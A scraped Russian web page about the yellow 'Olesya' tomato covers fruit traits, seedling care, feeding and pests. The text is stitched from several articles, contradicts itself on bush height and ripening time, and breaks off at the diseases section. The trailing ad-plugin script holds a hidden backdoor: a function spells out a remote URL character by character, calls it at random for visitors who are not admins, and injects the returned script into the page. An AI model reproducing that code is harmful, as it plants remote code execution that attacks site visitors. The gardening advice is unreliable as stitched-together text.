0 просмотров
Рейтинг статьи
1 звезда 2 звезды 3 звезды 4 звезды 5 звезд
Загрузка...

Томат олеся описание сорта фото отзывы

Сорт томата Олеся

Томат Олеся приятно разнообразит садовую коллекцию овощей янтарно-желтыми солнечными плодами. Они обладают прекрасным вкусом, но их выращивание имеет свои нюансы. Перед посадкой стоит ознакомиться с описанием сорта, учесть его достоинства и недостатки, изучить правила агротехники.

Сорт томата Олеся

Описание сорта

Помидоры Олеся относятся к среднеспелым сортам – созревают в августе или в конце июля.

Куст – высокорослый, требует пасынкования и подвязки. Для оптимальной урожайности его формируют в 2 стебля. При формировке в 1 стебель плоды вырастают более крупными, но их будет меньше.

В среднем, с одного куста собирают 2-3 кг..

Томат имеет характерный желто-оранжевый окрас и удлиненную форму с острым кончиком. Вес – от 150 до 300 г., вкус – сладкий, мякоть – плотная и мясистая, кожица – тонкая. Плоды хороши в свежем виде и в качестве соусов, соков. Для засолки и маринования не подходят.

Преимущества и недостатки

Главным достоинством считается превосходный вкус помидоров и их привлекательный внешний вид.

К недостаткам относят: невысокую урожайность, непригодность к маринованию, необходимость дополнительного ухода.

Посев и пересадка

Сорт томата Олеся предназначен для теплых и умеренных климатических зон.

Высаживать рассаду можно в теплицу или открытый грунт – сорт неплохо переносит кратковременные холода и засухи. В более холодных регионах для выращивания необходима теплица.

Средний период роста рассады (от посева до момента готовности к пересадки) – два месяца. Посев семян производят в середине или в конце марта.

Рассада

Перед посевом семена замачивают в теплой воде (от 12 до 24 часов) и обрабатывают раствором марганцовки (10-15 минут).

  • Каждое семя углубляют в увлажненную землю не более, чем на 1,5-2 см.
  • Лоток накрывают полиэтиленом и устанавливают в теплое место, поддерживая температуру 25-28°С.
  • После появления всходов пленку снимают и аккуратно увлажняют землю теплой отстоянной водой.

При появлении шестого листа рассаду можно пересаживать на постоянное место

Теперь для оптимального роста рассады нужна температура 20°С и хорошая освещенность.

Когда у растений появляется по 2 настоящих листа – их пикируют в горшочки или более просторные лотки. В это же время можно подкормить рассаду комплексными удобрениями.

К моменту пересадки на растениях должно быть 5-6 настоящих листьев и полноценная цветочная кисть. За 10-12 дней до пересадки нужно начинать закаливание рассады, постепенно понижая температуру до 14°С.

Татьяна Орлова (Василидченко) (канд. с.-х. наук):

Закалка нужна не только для того, чтобы рассада привыкла к более холодному воздуху, но и ко всем неблагоприятным условиям открытого грунта: яркому солнцу, сильному ветру, жаре.

Пересадка

Почву перед пересадкой необходимо удобрить органикой или комплексом минеральных удобрений. Для грядки или теплицы лучше выбрать хорошо освещенное солнечное место.

Кроме того, надо уделить внимание опоре – установить шпалеру, садовую сетку или колья для подвязывания. Высаживают по 3 куста на м², если планируют формировать их в 2 стебля.

Татьяна Орлова (Василидченко) (канд. с.-х. наук):

Перед посадкой весной в почву можно вносить только хорошо разложившуюся органику: перегной, хорошо разложившийся компост. Внесение полуперепревшего навоза или компоста проводят осенью под перекопку почвы.

Кроме удаления лишних побегов и подвязки стеблей к мерам ухода относят: регулярный полив, рыхление почвы, прополку, окучивание, мульчирование и подкормку.

  • Поливают раз в неделю, используя теплую отстоянную воду. Делают это строго под корень или капельным путем.
  • Рыхлить землю можно после полива или по мере необходимости, совмещая этот процесс с прополкой. Это обеспечивает доступ кислорода и воды к корням, создает профилактику заболеваниям.
  • Окучивают растения раз в две недели, не давая корешкам оголяться и утепляя их для хорошего роста.
  • Многие огородники рекомендуют мульчировать грядки, чтобы избежать пересыхания и замерзания почвы, обеспечить дополнительное питание корням и упростить уход за растениями. В качестве мульчи используют компост, опилки, измельченную солому или траву.

Необходимо как минимум три подкормки: через две недели после пересадки, при формировании завязей и при плодоношении.

Дополнительно сорт Олеся нуждается в питании раз в 2-3 недели комплексными минеральными удобрениями. Это обеспечит получение крупных и сладких плодов.

Татьяна Орлова (Василидченко) (канд. с.-х. наук):

Среди овощных культур томат наиболее требовательное растение к усвояемому фосфору, который накапливается в основном в плодах и семенах. При недостатке фосфора плоды томата бывают кислыми.

Болезни и вредители

Согласно описанию, Олеся – достаточно устойчивый к болезням и вредителям томат, однако риски существуют и для нее.

Среди потенциальных вредителей: грибки кладоспориоза, мозаика, слизни, белокрылка, паутинные клещи, медведки. Мерами профилактики являются: соблюдение севооборота, своевременное рыхление, прополка и подкормка.

Во избежание болезней лучше посадить помидоры после пряных трав, капусты, огурцов, лука. Для профилактики грибков рядом с помидорными грядками высаживают бархатцы, редиску, горчицу.

При первых симптомах недуга – нужно опрыскивать растения инсектицидами или фунгицидами (при корневых гнилях препарат вводят под корень).

Характеристика томата сорта Олеся

Томаты уже давно пользуются популярностью среди огородников. Они не требуют особого ухода и быстро дают плоды. Один из самых новых сортов помидор, выведенный русскими селекционерами из компании «Сибирский сад», — томат Олеся.

Характеристика томата сорта Олеся

Этот сорт выбирают из-за красивого внешнего вида и полезных свойств. По оценке экспертов, вкусовые качества томата Олеся находятся на высоком уровне. Нежная мякоть и мягкая структура плодов – вот почему эти помидоры выбирают те, кто соблюдает сбалансированное или диетическое питание.

Характеристика

Садовники знают, что помидоры насыщенного красного цвета всегда занимают лидирующие позиции на рынке. На втором месте находятся оранжевые томаты. Они не вызывают аллергических реакций у взрослых и детей.

Их особая ценность – наличие большого количества каротина. Это влияет на улучшение обменных процессов, работу желудочно-кишечного тракта, улучшение зрения, усиливает иммунную систему. Опытные огородники отмечают, что урожайность сорта средняя.

Описание сорта

Выращивание томатов Олеся в большинстве случаев проводится в теплицах. Особенно актуально это для жителей средней полосы.

Характеристика томата Олеся выглядит следующим образом:

  • среднеранний, поэтому плодоносит через 100-110 дней после высадки;
  • индетерминантный, рост стебля которого не ограниченный;
  • желтоплодный, что проявляется в качестве плодов желтого цвета и т.д.

Имея плотную кожуру, помидоры отлично проявили себя во время транспортировок. Трещин не образовалось, так же как и вмятин. Устойчив к низким температурам, но лучше содержать растение в комфортных для него условиях. Урожайность равна 8-11 кг на один квадратный метр.

Одними из способов разведения являются высадка в открытом грунте или под покрытием из пленки. Именно эти варианты отмечены в Госреестре России.

Описание куста

Куст помидор сорта Олеся достигает в высоту 1,5-1,8 м. Растение имеет такую характеристику, как индетерминантность, поэтому возможно превышение обозначенного показателя.

Листья имеют ярко выраженный зеленый цвет. По форме они ничем не отличаются от листвы других сортов томатов. Соцветия простые, а ось растения не ветвится.

Томат Олеся требует подвязки куста к опоре. Она может быть сделана из металла или древесины. Для получения хороших результатов, томат можно формировать в два стебля.

Описание плодов

Плоды сорта Олеся не подходят для консервации

Качество плодов зависит от качества ухода за растением. Каждому садоводу хочется получить вкусные, сочные, мясистые томаты и в большом количестве.

Описание плодов выглядит таким образом:

  • по форме это овальные удлиненные сливообразные помидоры;
  • имеют огненно-желтый окрас или оранжевый оттенок;
  • средний вес равен 180-280 г;
  • структура мясистая;
  • количество семян внутри небольшое.

Урожайность томата Олеся не отличается высоким значением. Оно находится в пределах 8-11 кг.

Томат активно используют в кулинарии. Чаще всего его добавляют в салаты или употребляют в свежем виде.

Важно отметить, что для консервации этот сорт не подойдет. При отсутствии кислорода и под давлением кожица лопает и томат теряет привлекательный вид.

Выращивание рассады

Покупать семена для рассады нужно только у проверенных продавцов или поставщиков. Это поможет избежать получения гнилых или болезненных продуктов. Специалисты рекомендуют приобрести семена в специализированных садовых магазинах. Сзади на упаковке можно ознакомиться с коротким описанием сорта.

Высадка семян

После покупки семян их можно обработать марганцовым раствором. Это поможет продезинфицировать растение и удалить возможные бактерии в нем.

Семена нужно сажать за 65 дней до момента пересадки ростков в грунт. Высаживать томаты Олеся нужно на расстоянии 30-40 см, чтобы уберечь корневую систему и разрастание растения.

Уход за ростками

В почве начнут появляться небольшие стебельки с листьями, высотой до 10 см. Выращивать ростки нужно учитывая температуру в помещении, осветление и влажность. Глубина заложения семян не может превышать 1 см. Будущие томаты накрываются пленкой или специальными крышками-колпаками.

Температурный режим должен находится в пределах от 23 до 25 градусов. Это способствует прорастанию семян или продолжению роста ростков.

Оптимальное осветление создаст лампа. В первые 5 дней она должна работать круглосуточно. Позже световой день для ростков это 12-17 часов.

Поливать растение до появления ростка нельзя. Это может привести к переувлажнению почвы и растения.

Высадка рассады

Закалка растений придаст им устойчивость к негативным факторам

Главной процедурой на этом этапе является пикирование – пересаживание ростков в отдельные горшки. Можно использовать и другие емкости: коробки, ящики, стаканчики. Чаще всего высаживают один росток в отдельный горшочек. Таким образом, томат Олеся будет иметь крепкую корневую систему и стебель.

Нужно закалять каждый росток, который должен иметь высокую устойчивость к негативному влиянию внешних факторов. Для этого постепенно понижают температуру до 14-16 градусов.

Удобрение

Первые две недели после образования ростков почва нуждается в подкормке. В качестве удобрений используют такие средства:

На начальном этапе очень действенными будут растворы на основе азота, суперфосфора, калия. На 1 кв.м нужно около 10 г каждого вещества.

В период плодоношения томаты сорта Олеся удобряют специальными гранолами. В их состав входят сера, железо, бор, магний, азот, фосфор, калий и прочие минеральные компоненты.

Во время интенсивного роста нужно проводить подкормку почвы любыми химическими или натуральными удобрениями.

Полив

Полив томатов обязательно должен быть регулярным. Перед увлажнением земли проверьте ее состояние. Мокрый грунт не стоит поливать, с сухим действуйте наоборот.

Лучшее время для полива – период после 17 часов дня. Важно, чтобы солнечные лучи уже не попадали на кусты.

Как получить качественные помидоры «Олеся»

Среди многообразия сортов томатов трудно выбрать самый достойный – тот, который не требовал бы особого ухода и отличался бы высокими вкусовыми качествами. Перед посадкой культуры необходимо изучить характеристику сорта, сравнить разные варианты. Рассмотрим характеристику и описание сорта Олеся, технологию его выращивания.

Описание и характеристика сорта

Выращивают томат Олеся как в открытом грунте, так и в тепличных условиях. Растение индетерминантное, то есть кусты в росте не ограничены, достигают в высоту 2-2,5 м. Поэтому томаты обязательно нужно подвязывать. Листва темно-зеленая, крупная.

Плоды имеют сливовидную вытянутую форму. Окрас желто-оранжевый. Поверхность у помидора гладкая, глянцевая. Мякоть среднего уровня плотности, сочная, семян крайне мало. Вес одного томата варьируется от 150 до 300 г.

Олеся имеет ярко выраженный сладкий вкус, поэтому сорт используют в приготовлении разных блюд. Он сочетается как с мясом, так и с рыбой, а также овощами. Помимо этого, его часто используют в качестве дополнения к супам, салатам, гарнирам, для приготовления овощных соков, паст, кетчупа.

Важно! Благодаря плотной кожуре сорт отлично переносит транспортировку и не теряет своих внешних и вкусовых качеств.

Главные достоинства и недостатки

Как всякий овощ, сорт Олеся имеет свои плюсы и минусы. К преимуществам сорта относятся:

  1. Способность расти в разных климатических условиях. Если вы проживаете на юге страны, то помидоры прекрасно приживутся в грядках под открытым небом, если в средней полосе России – в теплицах.
  2. В составе помидоров содержится большое количество каротина, из-за чего они и имеют желто-оранжевый цвет. Каротин оказывает благоприятное воздействие на организм человека – выступает природным антиоксидантом, подавляет риск преждевременного старения, снижает риск заболевания сердца и сосудов.
  3. Высокая устойчивость к транспортировке.
  4. Хороший иммунитет к заболеваниям культуры.
  5. Эффектный внешний вид позволяет использовать томаты в свежем виде.

К недостаткам сорта Олеся относятся:
  1. Необходимость подвязывания. Так как кусты вырастают до 2 м в высоту, нужно обязательно подвязывать стебли, иначе они сломаются под весом созревающих томатов. Этим томаты Олеся проигрывают перед другими сортами – теми, которые дают прекрасный урожай и без подвязки.
  2. Вес плодов большой, поэтому они не подходят для консервирования или маринования. Кроме того, если вы все-таки решили законсервировать томаты Олеся, то имейте в виду, что они растрескаются, а это отразится и на внешнем виде, и на вкусе.

Болезни и вредители томата Олеся

Хотя томат обладает высокой устойчивостью к основным вирусам и болезням, никто не может дать 100% гарантию. В природе еще не существует сорта, который бы был защищен от всех заболеваний.

Болезни

Помидоры Олеся подвержены следующим заболеваниям:

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};